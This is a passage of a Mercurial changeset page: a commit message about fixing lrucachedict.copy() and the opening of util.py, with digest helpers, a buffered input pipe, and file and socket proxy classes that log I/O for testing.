util: properly copy lrucachedict instances...
Gregory Szorc
r39599:b31b01f9 default
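This changeset fixes lrucachedict.copy(). The cache's circular linked list can
contain empty placeholder nodes: the initial node stays empty until the cache
reaches capacity, and __delitem__ empties nodes in place rather than unlinking
them. The old copy() started at self._head.prev unconditionally and copied
len(self._cache) nodes from there, so copying a cache that was not full (or had
seen a deletion) could start on an empty node, inserting its _notset key into
the copy and dropping a real entry. The new code first skips past the empty
nodes to find the oldest real entry, then copies oldest-to-newest so the copy
preserves recency order. A minimal sketch of the affected case (hypothetical
keys and values, not part of the changeset):

    d = lrucachedict(4)   # capacity 4; the initial ring node is still empty
    d['a'] = 'va'
    d['b'] = 'vb'         # only two real entries in the ring
    c = d.copy()          # old code could start copying from an empty node
    assert 'a' in c and 'b' in c and len(c) == 2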
@@ -1,3877 +1,3885
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 try:
130 130 recvfds = osutil.recvfds
131 131 except AttributeError:
132 132 pass
133 133
134 134 # Python compatibility
135 135
136 136 _notset = object()
137 137
138 138 def bitsfrom(container):
139 139 bits = 0
140 140 for bit in container:
141 141 bits |= bit
142 142 return bits
143 143
144 144 # python 2.6 still has deprecation warnings enabled by default. We do not want
145 145 # to display anything to the standard user, so detect if we are running tests
146 146 # and only use python deprecation warnings in this case.
147 147 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 148 if _dowarn:
149 149 # explicitly unfilter our warning for python 2.7
150 150 #
151 151 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 152 # However, the module name set through PYTHONWARNINGS was matched exactly, so
153 153 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
154 154 # makes the whole PYTHONWARNINGS thing useless for our use case.
155 155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 158 if _dowarn and pycompat.ispy3:
159 159 # silence warning emitted by passing user string to re.sub()
160 160 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 161 r'mercurial')
162 162 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 163 DeprecationWarning, r'mercurial')
164 164 # TODO: reinvent imp.is_frozen()
165 165 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 166 DeprecationWarning, r'mercurial')
167 167
168 168 def nouideprecwarn(msg, version, stacklevel=1):
169 169 """Issue a Python-native deprecation warning
170 170
171 171 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 172 """
173 173 if _dowarn:
174 174 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 175 " update your code.)") % version
176 176 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 177
178 178 DIGESTS = {
179 179 'md5': hashlib.md5,
180 180 'sha1': hashlib.sha1,
181 181 'sha512': hashlib.sha512,
182 182 }
183 183 # List of digest types from strongest to weakest
184 184 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 185
186 186 for k in DIGESTS_BY_STRENGTH:
187 187 assert k in DIGESTS
188 188
189 189 class digester(object):
190 190 """helper to compute digests.
191 191
192 192 This helper can be used to compute one or more digests given their name.
193 193
194 194 >>> d = digester([b'md5', b'sha1'])
195 195 >>> d.update(b'foo')
196 196 >>> [k for k in sorted(d)]
197 197 ['md5', 'sha1']
198 198 >>> d[b'md5']
199 199 'acbd18db4cc2f85cedef654fccc4a4d8'
200 200 >>> d[b'sha1']
201 201 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 202 >>> digester.preferred([b'md5', b'sha1'])
203 203 'sha1'
204 204 """
205 205
206 206 def __init__(self, digests, s=''):
207 207 self._hashes = {}
208 208 for k in digests:
209 209 if k not in DIGESTS:
210 210 raise error.Abort(_('unknown digest type: %s') % k)
211 211 self._hashes[k] = DIGESTS[k]()
212 212 if s:
213 213 self.update(s)
214 214
215 215 def update(self, data):
216 216 for h in self._hashes.values():
217 217 h.update(data)
218 218
219 219 def __getitem__(self, key):
220 220 if key not in DIGESTS:
221 221 raise error.Abort(_('unknown digest type: %s') % key)
222 222 return nodemod.hex(self._hashes[key].digest())
223 223
224 224 def __iter__(self):
225 225 return iter(self._hashes)
226 226
227 227 @staticmethod
228 228 def preferred(supported):
229 229 """returns the strongest digest type in both supported and DIGESTS."""
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 if k in supported:
233 233 return k
234 234 return None
235 235
236 236 class digestchecker(object):
237 237 """file handle wrapper that additionally checks content against a given
238 238 size and digests.
239 239
240 240 d = digestchecker(fh, size, {'md5': '...'})
241 241
242 242 When multiple digests are given, all of them are validated.
243 243 """
244 244
245 245 def __init__(self, fh, size, digests):
246 246 self._fh = fh
247 247 self._size = size
248 248 self._got = 0
249 249 self._digests = dict(digests)
250 250 self._digester = digester(self._digests.keys())
251 251
252 252 def read(self, length=-1):
253 253 content = self._fh.read(length)
254 254 self._digester.update(content)
255 255 self._got += len(content)
256 256 return content
257 257
258 258 def validate(self):
259 259 if self._size != self._got:
260 260 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 261 (self._size, self._got))
262 262 for k, v in self._digests.items():
263 263 if v != self._digester[k]:
264 264 # i18n: first parameter is a digest name
265 265 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 266 (k, v, self._digester[k]))
267 267
268 268 try:
269 269 buffer = buffer
270 270 except NameError:
271 271 def buffer(sliceable, offset=0, length=None):
272 272 if length is not None:
273 273 return memoryview(sliceable)[offset:offset + length]
274 274 return memoryview(sliceable)[offset:]
275 275
276 276 _chunksize = 4096
277 277
278 278 class bufferedinputpipe(object):
279 279 """a manually buffered input pipe
280 280
281 281 Python will not let us use buffered IO and lazy reading with 'polling' at
282 282 the same time. We cannot probe the buffer state and select will not detect
283 283 that data are ready to read if they are already buffered.
284 284
285 285 This class lets us work around that by implementing its own buffering
286 286 (allowing efficient readline) while offering a way to know if the buffer is
287 287 empty from the output (allowing collaboration of the buffer with polling).
288 288
289 289 This class lives in the 'util' module because it makes use of the 'os'
290 290 module from the python stdlib.
291 291 """
292 292 def __new__(cls, fh):
293 293 # If we receive a fileobjectproxy, we need to use a variation of this
294 294 # class that notifies observers about activity.
295 295 if isinstance(fh, fileobjectproxy):
296 296 cls = observedbufferedinputpipe
297 297
298 298 return super(bufferedinputpipe, cls).__new__(cls)
299 299
300 300 def __init__(self, input):
301 301 self._input = input
302 302 self._buffer = []
303 303 self._eof = False
304 304 self._lenbuf = 0
305 305
306 306 @property
307 307 def hasbuffer(self):
308 308 """True if any data is currently buffered
309 309
310 310 This will be used externally as a pre-step for polling IO. If there is
311 311 already data, then no polling should be put in place."""
312 312 return bool(self._buffer)
313 313
314 314 @property
315 315 def closed(self):
316 316 return self._input.closed
317 317
318 318 def fileno(self):
319 319 return self._input.fileno()
320 320
321 321 def close(self):
322 322 return self._input.close()
323 323
324 324 def read(self, size):
325 325 while (not self._eof) and (self._lenbuf < size):
326 326 self._fillbuffer()
327 327 return self._frombuffer(size)
328 328
329 329 def unbufferedread(self, size):
330 330 if not self._eof and self._lenbuf == 0:
331 331 self._fillbuffer(max(size, _chunksize))
332 332 return self._frombuffer(min(self._lenbuf, size))
333 333
334 334 def readline(self, *args, **kwargs):
335 335 if 1 < len(self._buffer):
336 336 # this should not happen because both read and readline end with a
337 337 # _frombuffer call that collapses it.
338 338 self._buffer = [''.join(self._buffer)]
339 339 self._lenbuf = len(self._buffer[0])
340 340 lfi = -1
341 341 if self._buffer:
342 342 lfi = self._buffer[-1].find('\n')
343 343 while (not self._eof) and lfi < 0:
344 344 self._fillbuffer()
345 345 if self._buffer:
346 346 lfi = self._buffer[-1].find('\n')
347 347 size = lfi + 1
348 348 if lfi < 0: # end of file
349 349 size = self._lenbuf
350 350 elif 1 < len(self._buffer):
351 351 # we need to take previous chunks into account
352 352 size += self._lenbuf - len(self._buffer[-1])
353 353 return self._frombuffer(size)
354 354
355 355 def _frombuffer(self, size):
356 356 """return at most 'size' data from the buffer
357 357
358 358 The data are removed from the buffer."""
359 359 if size == 0 or not self._buffer:
360 360 return ''
361 361 buf = self._buffer[0]
362 362 if 1 < len(self._buffer):
363 363 buf = ''.join(self._buffer)
364 364
365 365 data = buf[:size]
366 366 buf = buf[len(data):]
367 367 if buf:
368 368 self._buffer = [buf]
369 369 self._lenbuf = len(buf)
370 370 else:
371 371 self._buffer = []
372 372 self._lenbuf = 0
373 373 return data
374 374
375 375 def _fillbuffer(self, size=_chunksize):
376 376 """read data to the buffer"""
377 377 data = os.read(self._input.fileno(), size)
378 378 if not data:
379 379 self._eof = True
380 380 else:
381 381 self._lenbuf += len(data)
382 382 self._buffer.append(data)
383 383
384 384 return data
385 385
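# [Editorial sketch, not part of util.py] Minimal use of bufferedinputpipe on
# a POSIX pipe, assuming Python 2 semantics (util.py's native-str literals).
# readline() is served from the internal buffer, and hasbuffer tells callers
# they may skip poll() because data is already pending.
import os
r, w = os.pipe()
os.write(w, b'line1\nline2\n')
os.close(w)
p = bufferedinputpipe(os.fdopen(r, 'rb'))
assert p.readline() == b'line1\n'   # one os.read() fills the buffer
assert p.hasbuffer                  # b'line2\n' is buffered; no poll needed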
386 386 def mmapread(fp):
387 387 try:
388 388 fd = getattr(fp, 'fileno', lambda: fp)()
389 389 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 390 except ValueError:
391 391 # Empty files cannot be mmapped, but mmapread should still work. Check
392 392 # if the file is empty, and if so, return an empty buffer.
393 393 if os.fstat(fd).st_size == 0:
394 394 return ''
395 395 raise
396 396
397 397 class fileobjectproxy(object):
398 398 """A proxy around file objects that tells a watcher when events occur.
399 399
400 400 This type is intended to only be used for testing purposes. Think hard
401 401 before using it in important code.
402 402 """
403 403 __slots__ = (
404 404 r'_orig',
405 405 r'_observer',
406 406 )
407 407
408 408 def __init__(self, fh, observer):
409 409 object.__setattr__(self, r'_orig', fh)
410 410 object.__setattr__(self, r'_observer', observer)
411 411
412 412 def __getattribute__(self, name):
413 413 ours = {
414 414 r'_observer',
415 415
416 416 # IOBase
417 417 r'close',
418 418 # closed is a property
419 419 r'fileno',
420 420 r'flush',
421 421 r'isatty',
422 422 r'readable',
423 423 r'readline',
424 424 r'readlines',
425 425 r'seek',
426 426 r'seekable',
427 427 r'tell',
428 428 r'truncate',
429 429 r'writable',
430 430 r'writelines',
431 431 # RawIOBase
432 432 r'read',
433 433 r'readall',
434 434 r'readinto',
435 435 r'write',
436 436 # BufferedIOBase
437 437 # raw is a property
438 438 r'detach',
439 439 # read defined above
440 440 r'read1',
441 441 # readinto defined above
442 442 # write defined above
443 443 }
444 444
445 445 # We only observe some methods.
446 446 if name in ours:
447 447 return object.__getattribute__(self, name)
448 448
449 449 return getattr(object.__getattribute__(self, r'_orig'), name)
450 450
451 451 def __nonzero__(self):
452 452 return bool(object.__getattribute__(self, r'_orig'))
453 453
454 454 __bool__ = __nonzero__
455 455
456 456 def __delattr__(self, name):
457 457 return delattr(object.__getattribute__(self, r'_orig'), name)
458 458
459 459 def __setattr__(self, name, value):
460 460 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 461
462 462 def __iter__(self):
463 463 return object.__getattribute__(self, r'_orig').__iter__()
464 464
465 465 def _observedcall(self, name, *args, **kwargs):
466 466 # Call the original object.
467 467 orig = object.__getattribute__(self, r'_orig')
468 468 res = getattr(orig, name)(*args, **kwargs)
469 469
470 470 # Call a method on the observer of the same name with arguments
471 471 # so it can react, log, etc.
472 472 observer = object.__getattribute__(self, r'_observer')
473 473 fn = getattr(observer, name, None)
474 474 if fn:
475 475 fn(res, *args, **kwargs)
476 476
477 477 return res
478 478
479 479 def close(self, *args, **kwargs):
480 480 return object.__getattribute__(self, r'_observedcall')(
481 481 r'close', *args, **kwargs)
482 482
483 483 def fileno(self, *args, **kwargs):
484 484 return object.__getattribute__(self, r'_observedcall')(
485 485 r'fileno', *args, **kwargs)
486 486
487 487 def flush(self, *args, **kwargs):
488 488 return object.__getattribute__(self, r'_observedcall')(
489 489 r'flush', *args, **kwargs)
490 490
491 491 def isatty(self, *args, **kwargs):
492 492 return object.__getattribute__(self, r'_observedcall')(
493 493 r'isatty', *args, **kwargs)
494 494
495 495 def readable(self, *args, **kwargs):
496 496 return object.__getattribute__(self, r'_observedcall')(
497 497 r'readable', *args, **kwargs)
498 498
499 499 def readline(self, *args, **kwargs):
500 500 return object.__getattribute__(self, r'_observedcall')(
501 501 r'readline', *args, **kwargs)
502 502
503 503 def readlines(self, *args, **kwargs):
504 504 return object.__getattribute__(self, r'_observedcall')(
505 505 r'readlines', *args, **kwargs)
506 506
507 507 def seek(self, *args, **kwargs):
508 508 return object.__getattribute__(self, r'_observedcall')(
509 509 r'seek', *args, **kwargs)
510 510
511 511 def seekable(self, *args, **kwargs):
512 512 return object.__getattribute__(self, r'_observedcall')(
513 513 r'seekable', *args, **kwargs)
514 514
515 515 def tell(self, *args, **kwargs):
516 516 return object.__getattribute__(self, r'_observedcall')(
517 517 r'tell', *args, **kwargs)
518 518
519 519 def truncate(self, *args, **kwargs):
520 520 return object.__getattribute__(self, r'_observedcall')(
521 521 r'truncate', *args, **kwargs)
522 522
523 523 def writable(self, *args, **kwargs):
524 524 return object.__getattribute__(self, r'_observedcall')(
525 525 r'writable', *args, **kwargs)
526 526
527 527 def writelines(self, *args, **kwargs):
528 528 return object.__getattribute__(self, r'_observedcall')(
529 529 r'writelines', *args, **kwargs)
530 530
531 531 def read(self, *args, **kwargs):
532 532 return object.__getattribute__(self, r'_observedcall')(
533 533 r'read', *args, **kwargs)
534 534
535 535 def readall(self, *args, **kwargs):
536 536 return object.__getattribute__(self, r'_observedcall')(
537 537 r'readall', *args, **kwargs)
538 538
539 539 def readinto(self, *args, **kwargs):
540 540 return object.__getattribute__(self, r'_observedcall')(
541 541 r'readinto', *args, **kwargs)
542 542
543 543 def write(self, *args, **kwargs):
544 544 return object.__getattribute__(self, r'_observedcall')(
545 545 r'write', *args, **kwargs)
546 546
547 547 def detach(self, *args, **kwargs):
548 548 return object.__getattribute__(self, r'_observedcall')(
549 549 r'detach', *args, **kwargs)
550 550
551 551 def read1(self, *args, **kwargs):
552 552 return object.__getattribute__(self, r'_observedcall')(
553 553 r'read1', *args, **kwargs)
554 554
555 555 class observedbufferedinputpipe(bufferedinputpipe):
556 556 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 557
558 558 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 559 bypass ``fileobjectproxy``. Because of this, we need to make
560 560 ``bufferedinputpipe`` aware of these operations.
561 561
562 562 This variation of ``bufferedinputpipe`` can notify observers about
563 563 ``os.read()`` events. It also re-publishes other events, such as
564 564 ``read()`` and ``readline()``.
565 565 """
566 566 def _fillbuffer(self):
567 567 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 568
569 569 fn = getattr(self._input._observer, r'osread', None)
570 570 if fn:
571 571 fn(res, _chunksize)
572 572
573 573 return res
574 574
575 575 # We use different observer methods because the operation isn't
576 576 # performed on the actual file object but on us.
577 577 def read(self, size):
578 578 res = super(observedbufferedinputpipe, self).read(size)
579 579
580 580 fn = getattr(self._input._observer, r'bufferedread', None)
581 581 if fn:
582 582 fn(res, size)
583 583
584 584 return res
585 585
586 586 def readline(self, *args, **kwargs):
587 587 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 588
589 589 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 590 if fn:
591 591 fn(res)
592 592
593 593 return res
594 594
595 595 PROXIED_SOCKET_METHODS = {
596 596 r'makefile',
597 597 r'recv',
598 598 r'recvfrom',
599 599 r'recvfrom_into',
600 600 r'recv_into',
601 601 r'send',
602 602 r'sendall',
603 603 r'sendto',
604 604 r'setblocking',
605 605 r'settimeout',
606 606 r'gettimeout',
607 607 r'setsockopt',
608 608 }
609 609
610 610 class socketproxy(object):
611 611 """A proxy around a socket that tells a watcher when events occur.
612 612
613 613 This is like ``fileobjectproxy`` except for sockets.
614 614
615 615 This type is intended to only be used for testing purposes. Think hard
616 616 before using it in important code.
617 617 """
618 618 __slots__ = (
619 619 r'_orig',
620 620 r'_observer',
621 621 )
622 622
623 623 def __init__(self, sock, observer):
624 624 object.__setattr__(self, r'_orig', sock)
625 625 object.__setattr__(self, r'_observer', observer)
626 626
627 627 def __getattribute__(self, name):
628 628 if name in PROXIED_SOCKET_METHODS:
629 629 return object.__getattribute__(self, name)
630 630
631 631 return getattr(object.__getattribute__(self, r'_orig'), name)
632 632
633 633 def __delattr__(self, name):
634 634 return delattr(object.__getattribute__(self, r'_orig'), name)
635 635
636 636 def __setattr__(self, name, value):
637 637 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 638
639 639 def __nonzero__(self):
640 640 return bool(object.__getattribute__(self, r'_orig'))
641 641
642 642 __bool__ = __nonzero__
643 643
644 644 def _observedcall(self, name, *args, **kwargs):
645 645 # Call the original object.
646 646 orig = object.__getattribute__(self, r'_orig')
647 647 res = getattr(orig, name)(*args, **kwargs)
648 648
649 649 # Call a method on the observer of the same name with arguments
650 650 # so it can react, log, etc.
651 651 observer = object.__getattribute__(self, r'_observer')
652 652 fn = getattr(observer, name, None)
653 653 if fn:
654 654 fn(res, *args, **kwargs)
655 655
656 656 return res
657 657
658 658 def makefile(self, *args, **kwargs):
659 659 res = object.__getattribute__(self, r'_observedcall')(
660 660 r'makefile', *args, **kwargs)
661 661
662 662 # The file object may be used for I/O. So we turn it into a
663 663 # proxy using our observer.
664 664 observer = object.__getattribute__(self, r'_observer')
665 665 return makeloggingfileobject(observer.fh, res, observer.name,
666 666 reads=observer.reads,
667 667 writes=observer.writes,
668 668 logdata=observer.logdata,
669 669 logdataapis=observer.logdataapis)
670 670
671 671 def recv(self, *args, **kwargs):
672 672 return object.__getattribute__(self, r'_observedcall')(
673 673 r'recv', *args, **kwargs)
674 674
675 675 def recvfrom(self, *args, **kwargs):
676 676 return object.__getattribute__(self, r'_observedcall')(
677 677 r'recvfrom', *args, **kwargs)
678 678
679 679 def recvfrom_into(self, *args, **kwargs):
680 680 return object.__getattribute__(self, r'_observedcall')(
681 681 r'recvfrom_into', *args, **kwargs)
682 682
683 683 def recv_into(self, *args, **kwargs):
684 684 return object.__getattribute__(self, r'_observedcall')(
685 685 r'recv_info', *args, **kwargs)
686 686
687 687 def send(self, *args, **kwargs):
688 688 return object.__getattribute__(self, r'_observedcall')(
689 689 r'send', *args, **kwargs)
690 690
691 691 def sendall(self, *args, **kwargs):
692 692 return object.__getattribute__(self, r'_observedcall')(
693 693 r'sendall', *args, **kwargs)
694 694
695 695 def sendto(self, *args, **kwargs):
696 696 return object.__getattribute__(self, r'_observedcall')(
697 697 r'sendto', *args, **kwargs)
698 698
699 699 def setblocking(self, *args, **kwargs):
700 700 return object.__getattribute__(self, r'_observedcall')(
701 701 r'setblocking', *args, **kwargs)
702 702
703 703 def settimeout(self, *args, **kwargs):
704 704 return object.__getattribute__(self, r'_observedcall')(
705 705 r'settimeout', *args, **kwargs)
706 706
707 707 def gettimeout(self, *args, **kwargs):
708 708 return object.__getattribute__(self, r'_observedcall')(
709 709 r'gettimeout', *args, **kwargs)
710 710
711 711 def setsockopt(self, *args, **kwargs):
712 712 return object.__getattribute__(self, r'_observedcall')(
713 713 r'setsockopt', *args, **kwargs)
714 714
715 715 class baseproxyobserver(object):
716 716 def _writedata(self, data):
717 717 if not self.logdata:
718 718 if self.logdataapis:
719 719 self.fh.write('\n')
720 720 self.fh.flush()
721 721 return
722 722
723 723 # Simple case writes all data on a single line.
724 724 if b'\n' not in data:
725 725 if self.logdataapis:
726 726 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 727 else:
728 728 self.fh.write('%s> %s\n'
729 729 % (self.name, stringutil.escapestr(data)))
730 730 self.fh.flush()
731 731 return
732 732
733 733 # Data with newlines is written to multiple lines.
734 734 if self.logdataapis:
735 735 self.fh.write(':\n')
736 736
737 737 lines = data.splitlines(True)
738 738 for line in lines:
739 739 self.fh.write('%s> %s\n'
740 740 % (self.name, stringutil.escapestr(line)))
741 741 self.fh.flush()
742 742
743 743 class fileobjectobserver(baseproxyobserver):
744 744 """Logs file object activity."""
745 745 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 746 logdataapis=True):
747 747 self.fh = fh
748 748 self.name = name
749 749 self.logdata = logdata
750 750 self.logdataapis = logdataapis
751 751 self.reads = reads
752 752 self.writes = writes
753 753
754 754 def read(self, res, size=-1):
755 755 if not self.reads:
756 756 return
757 757 # Python 3 can return None from reads at EOF instead of empty strings.
758 758 if res is None:
759 759 res = ''
760 760
761 761 if size == -1 and res == '':
762 762 # Suppress pointless read(-1) calls that return
763 763 # nothing. These happen _a lot_ on Python 3, and there
764 764 # doesn't seem to be a better workaround to have matching
765 765 # Python 2 and 3 behavior. :(
766 766 return
767 767
768 768 if self.logdataapis:
769 769 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 770
771 771 self._writedata(res)
772 772
773 773 def readline(self, res, limit=-1):
774 774 if not self.reads:
775 775 return
776 776
777 777 if self.logdataapis:
778 778 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 779
780 780 self._writedata(res)
781 781
782 782 def readinto(self, res, dest):
783 783 if not self.reads:
784 784 return
785 785
786 786 if self.logdataapis:
787 787 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 788 res))
789 789
790 790 data = dest[0:res] if res is not None else b''
791 791 self._writedata(data)
792 792
793 793 def write(self, res, data):
794 794 if not self.writes:
795 795 return
796 796
797 797 # Python 2 returns None from some write() calls. Python 3 (reasonably)
798 798 # returns the number of bytes written.
799 799 if res is None and data:
800 800 res = len(data)
801 801
802 802 if self.logdataapis:
803 803 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
804 804
805 805 self._writedata(data)
806 806
807 807 def flush(self, res):
808 808 if not self.writes:
809 809 return
810 810
811 811 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
812 812
813 813 # For observedbufferedinputpipe.
814 814 def bufferedread(self, res, size):
815 815 if not self.reads:
816 816 return
817 817
818 818 if self.logdataapis:
819 819 self.fh.write('%s> bufferedread(%d) -> %d' % (
820 820 self.name, size, len(res)))
821 821
822 822 self._writedata(res)
823 823
824 824 def bufferedreadline(self, res):
825 825 if not self.reads:
826 826 return
827 827
828 828 if self.logdataapis:
829 829 self.fh.write('%s> bufferedreadline() -> %d' % (
830 830 self.name, len(res)))
831 831
832 832 self._writedata(res)
833 833
834 834 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
835 835 logdata=False, logdataapis=True):
836 836 """Turn a file object into a logging file object."""
837 837
838 838 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
839 839 logdata=logdata, logdataapis=logdataapis)
840 840 return fileobjectproxy(fh, observer)
841 841
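# [Editorial sketch, not part of util.py] Wrapping a file object so its I/O
# is logged to another handle; the name and data here are hypothetical.
import io, sys
fh = makeloggingfileobject(sys.stderr, io.BytesIO(b'data'), 'src',
                           logdata=True)
fh.read()   # emits "src> read(-1) -> 4: data" and returns b'data'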
842 842 class socketobserver(baseproxyobserver):
843 843 """Logs socket activity."""
844 844 def __init__(self, fh, name, reads=True, writes=True, states=True,
845 845 logdata=False, logdataapis=True):
846 846 self.fh = fh
847 847 self.name = name
848 848 self.reads = reads
849 849 self.writes = writes
850 850 self.states = states
851 851 self.logdata = logdata
852 852 self.logdataapis = logdataapis
853 853
854 854 def makefile(self, res, mode=None, bufsize=None):
855 855 if not self.states:
856 856 return
857 857
858 858 self.fh.write('%s> makefile(%r, %r)\n' % (
859 859 self.name, mode, bufsize))
860 860
861 861 def recv(self, res, size, flags=0):
862 862 if not self.reads:
863 863 return
864 864
865 865 if self.logdataapis:
866 866 self.fh.write('%s> recv(%d, %d) -> %d' % (
867 867 self.name, size, flags, len(res)))
868 868 self._writedata(res)
869 869
870 870 def recvfrom(self, res, size, flags=0):
871 871 if not self.reads:
872 872 return
873 873
874 874 if self.logdataapis:
875 875 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
876 876 self.name, size, flags, len(res[0])))
877 877
878 878 self._writedata(res[0])
879 879
880 880 def recvfrom_into(self, res, buf, size, flags=0):
881 881 if not self.reads:
882 882 return
883 883
884 884 if self.logdataapis:
885 885 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
886 886 self.name, size, flags, res[0]))
887 887
888 888 self._writedata(buf[0:res[0]])
889 889
890 890 def recv_into(self, res, buf, size=0, flags=0):
891 891 if not self.reads:
892 892 return
893 893
894 894 if self.logdataapis:
895 895 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
896 896 self.name, size, flags, res))
897 897
898 898 self._writedata(buf[0:res])
899 899
900 900 def send(self, res, data, flags=0):
901 901 if not self.writes:
902 902 return
903 903
904 904 self.fh.write('%s> send(%d, %d) -> %d' % (
905 905 self.name, len(data), flags, len(res)))
906 906 self._writedata(data)
907 907
908 908 def sendall(self, res, data, flags=0):
909 909 if not self.writes:
910 910 return
911 911
912 912 if self.logdataapis:
913 913 # Returns None on success. So don't bother reporting return value.
914 914 self.fh.write('%s> sendall(%d, %d)' % (
915 915 self.name, len(data), flags))
916 916
917 917 self._writedata(data)
918 918
919 919 def sendto(self, res, data, flagsoraddress, address=None):
920 920 if not self.writes:
921 921 return
922 922
923 923 if address:
924 924 flags = flagsoraddress
925 925 else:
926 926 flags = 0
927 927
928 928 if self.logdataapis:
929 929 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
930 930 self.name, len(data), flags, address, res))
931 931
932 932 self._writedata(data)
933 933
934 934 def setblocking(self, res, flag):
935 935 if not self.states:
936 936 return
937 937
938 938 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
939 939
940 940 def settimeout(self, res, value):
941 941 if not self.states:
942 942 return
943 943
944 944 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
945 945
946 946 def gettimeout(self, res):
947 947 if not self.states:
948 948 return
949 949
950 950 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
951 951
952 952 def setsockopt(self, res, level, optname, value):
953 953 if not self.states:
